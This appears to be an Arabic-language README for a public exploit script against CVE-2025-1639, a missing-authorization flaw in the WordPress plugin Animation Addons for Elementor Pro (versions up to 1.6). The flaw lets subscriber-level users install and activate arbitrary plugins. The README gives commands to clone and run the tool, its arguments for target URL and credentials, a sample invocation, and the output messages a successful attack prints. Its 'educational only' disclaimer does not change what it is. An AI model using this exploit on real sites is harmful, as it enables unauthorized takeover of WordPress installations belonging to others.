
Animation Addons for Elementor Pro <= 1.6 - نقص التفويض لتثبيت/تفعيل إضافات عشوائي من قبل مستخدم مصادق (مشترك+)
إضافة Animation Addons for Elementor Pro لووردبريس معرضة لتثبيت إضافات غير مصرح بها بسبب نقص التحقق من الصلاحية في دالة install_elementor_plugin_handler() في جميع الإصدارات حتى 1.6. هذا يتيح للمهاجمين الموثقين، بصلاحية المشترك فما فوق، تثبيت وتفعيل إضافات عشوائية يمكن استغلالها لزيادة إصابة الضحية عندما لا يكون Elementor مفعلاً على الموقع الضعيف.
requestsBeautifulSoupgit clone https://github.com/Nxploited/CVE-2025-1639.git
cd CVE-2025-1639
pip install -r requirements.txt
usage: CVE-2025-1639.py [-h] -u URL -un USERNAME -p PASSWORD [-pl PLUGIN]
Exploit script for CVE-2025-1639 # By Nxploit | Kaled ALenazi
options:
-h, --help show this help message and exit
-u URL, --url URL Target URL
-un USERNAME, --username USERNAME
WordPress username
-p PASSWORD, --password PASSWORD
WordPress password
-pl PLUGIN, --plugin PLUGIN
Plugin slug to upload and activate (default: wp-maintenance-mode)
-u, --url: عنوان URL الهدف-un, --username: اسم مستخدم ووردبريس-p, --password: كلمة مرور ووردبريس-pl, --plugin (اختياري): اسم الإضافة المراد رفعها وتفعيلها (الافتراضي: wp-maintenance-mode)python CVE-2025-1639.py -u http://example.com/wordpress -un admin -p password -pl wp-maintenance-mode
Logged in successfully.: يشير إلى نجاح تسجيل الدخول.The site is vulnerable... Exploiting and uploading the plugin.: يشير إلى أن الموقع الهدف ضعيف ويجري تنفيذ الاستغلال ورفع الإضافة.Plugin uploaded and activated successfully.: يشير إلى نجاح رفع الإضافة وتفعيلها.Failed to log in.: يشير إلى فشل تسجيل الدخول.The site is not vulnerable.: يشير إلى أن الموقع الهدف لا يشغل إصدارًا ضعيفًا.Failed to extract security token.: يشير إلى فشل استخراج رمز الأمان المطلوب للاستغلال.Failed to upload and activate the plugin.: يشير إلى فشل رفع الإضافة وتفعيلها.هذا السكربت لأغراض تعليمية فقط. استخدمه على مسؤوليتك الخاصة. المؤلف غير مسؤول عن أي ضرر يسببه هذا السكربت.